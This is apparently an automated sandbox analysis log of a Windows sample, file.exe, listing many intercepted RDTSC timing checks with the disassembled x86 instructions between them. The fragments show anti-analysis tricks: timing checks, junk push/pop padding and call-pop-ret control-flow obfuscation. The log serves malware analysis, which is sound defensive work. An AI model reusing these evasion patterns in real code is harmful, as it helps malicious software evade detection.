Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 32982F second address: 329878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FE2E9231EB8h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE2E9231EB3h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FE2E9231EB1h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 329878 second address: 329882 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FE2E9211D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 329882 second address: 32989D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE2E9231EB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C9A26 second address: 2C9A55 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FE2E9211D76h 0x00000008 jmp 00007FE2E9211D7Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FE2E9211D86h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 2C9A55 second address: 2C9A5A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 329E58 second address: 329E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FE2E9211D76h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 329E65 second address: 329E69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3253B7 second address: 3253BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3279BE second address: 3279C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 32A064 second address: 32A077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push esi 0x0000000a pushad 0x0000000b jc 00007FE2E9211D76h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 32AFB1 second address: 32AFBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9231EAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 32AFBF second address: 32AFC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 327A9F second address: 327AA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 32AFC5 second address: 32AFC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 32B106 second address: 32B10A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 32E6A1 second address: 32E6B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 32E6B1 second address: 32E6B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 32E6B8 second address: 32E759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FE2E9211D78h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 jnp 00007FE2E9211D7Ch 0x00000028 mov ebx, dword ptr [ebp+122D2D4Ah] 0x0000002e mov di, 4643h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007FE2E9211D78h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 0000001Bh 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e jc 00007FE2E9211D76h 0x00000054 push 00000000h 0x00000056 call 00007FE2E9211D85h 0x0000005b mov ebx, 2ACDA111h 0x00000060 pop ebx 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007FE2E9211D89h 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3306CE second address: 3306D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3306D2 second address: 3306D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3306D6 second address: 3306DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3345AB second address: 3345AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 337EDC second address: 337EE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 337EE2 second address: 337EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 337EE6 second address: 337EFA instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE2E9231EA6h 0x00000008 jnl 00007FE2E9231EA6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 337EFA second address: 337EFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 33BAF8 second address: 33BB0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE2E9231EAFh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 33BC5B second address: 33BC61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 33BC61 second address: 33BC65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 33BC65 second address: 33BC73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 33BC73 second address: 33BC77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 33BC77 second address: 33BC8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9211D80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 33BDDC second address: 33BDE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 33BDE0 second address: 33BDE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 33BDE6 second address: 33BDED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 33BDED second address: 33BDF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 341077 second address: 3410CF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jo 00007FE2E9231EB6h 0x00000010 jmp 00007FE2E9231EB0h 0x00000015 pushad 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 jl 00007FE2E9231EA6h 0x0000001e popad 0x0000001f popad 0x00000020 mov eax, dword ptr [esp+04h] 0x00000024 jmp 00007FE2E9231EB6h 0x00000029 mov eax, dword ptr [eax] 0x0000002b push eax 0x0000002c push edx 0x0000002d push ecx 0x0000002e jmp 00007FE2E9231EADh 0x00000033 pop ecx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3410CF second address: 3410D9 instructions: 0x00000000 rdtsc 0x00000002 je 00007FE2E9211D7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 330A07 second address: 330A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3177B4 second address: 3177C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 jl 00007FE2E9211D7Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3455CC second address: 3455D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3455D0 second address: 3455DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3455DC second address: 3455E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FE2E9231EA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 345854 second address: 345858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 345858 second address: 34586F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FE2E9231EAEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 34586F second address: 34587A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 34587A second address: 34587E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 34587E second address: 3458BB instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE2E9211D76h 0x00000008 jmp 00007FE2E9211D84h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push ecx 0x00000011 jmp 00007FE2E9211D89h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3458BB second address: 3458BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3458BF second address: 3458C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 345B4B second address: 345B5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FE2E9231EA6h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 345B5A second address: 345B62 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 345B62 second address: 345B73 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 je 00007FE2E9231EA6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 345CF7 second address: 345D01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 34A097 second address: 34A09F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 34A09F second address: 34A0A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 34A0A4 second address: 34A0B2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jc 00007FE2E9231EA6h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 34A0B2 second address: 34A0B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 34A0B8 second address: 34A0BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 352F94 second address: 352F98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 352F98 second address: 352FA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007FE2E9231EA6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 352FA8 second address: 352FAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 352FAE second address: 352FBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 352336 second address: 35233E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35233E second address: 352372 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9231EB8h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e jno 00007FE2E9231EA6h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 pushad 0x00000019 jno 00007FE2E9231EA6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 351912 second address: 351921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE2E9211D7Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3526BA second address: 3526CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9231EAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3526CC second address: 3526D1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3526D1 second address: 3526FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jnc 00007FE2E9231EA6h 0x0000000c je 00007FE2E9231EA6h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push edi 0x00000019 pop edi 0x0000001a push eax 0x0000001b pop eax 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f push edi 0x00000020 jp 00007FE2E9231EA6h 0x00000026 push ecx 0x00000027 pop ecx 0x00000028 pop edi 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35297C second address: 352997 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9211D7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FE2E9211D7Ch 0x0000000f js 00007FE2E9211D76h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 357475 second address: 35747B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35747B second address: 357485 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE2E9211D7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 35634B second address: 356351 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 356351 second address: 35636C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007FE2E9211D81h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 312D76 second address: 312D7C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 312E25 second address: 312E2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 312E2A second address: 312E69 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FE2E9231EB8h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007FE2E9231EBEh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 312E69 second address: 312E6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 312E6E second address: 312E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 31302A second address: 313030 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3136E0 second address: 3136E5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3136E5 second address: 31370A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007FE2E9211D89h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 31370A second address: 313712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 313712 second address: 31373B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE2E9211D7Fh 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c push 0000001Eh 0x0000000e or edx, dword ptr [ebp+122D1A6Ch] 0x00000014 nop 0x00000015 pushad 0x00000016 pushad 0x00000017 push eax 0x00000018 pop eax 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 31373B second address: 31374A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 31381B second address: 313820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 313820 second address: 313826 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 313A75 second address: 313AC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9211D84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a nop 0x0000000b mov ecx, dword ptr [ebp+122D189Ah] 0x00000011 lea eax, dword ptr [ebp+124873A3h] 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007FE2E9211D78h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 00000014h 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 mov edx, dword ptr [ebp+122D1E6Fh] 0x00000037 nop 0x00000038 push esi 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 313AC3 second address: 313AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 313AC7 second address: 313AD9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007FE2E9211D78h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 313AD9 second address: 313B54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FE2E9231EA6h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FE2E9231EA8h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 mov dl, 96h 0x0000002b and edi, 0848F34Ah 0x00000031 lea eax, dword ptr [ebp+1248735Fh] 0x00000037 mov dword ptr [ebp+122D1B2Eh], edx 0x0000003d nop 0x0000003e jne 00007FE2E9231EBAh 0x00000044 push eax 0x00000045 pushad 0x00000046 pushad 0x00000047 push edx 0x00000048 pop edx 0x00000049 jmp 00007FE2E9231EB8h 0x0000004e popad 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 313B54 second address: 2F55B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE2E9211D80h 0x00000009 popad 0x0000000a popad 0x0000000b nop 0x0000000c sub dword ptr [ebp+122D2490h], ecx 0x00000012 call dword ptr [ebp+122D1C8Ch] 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jnp 00007FE2E9211D76h 0x00000022 rdtsc
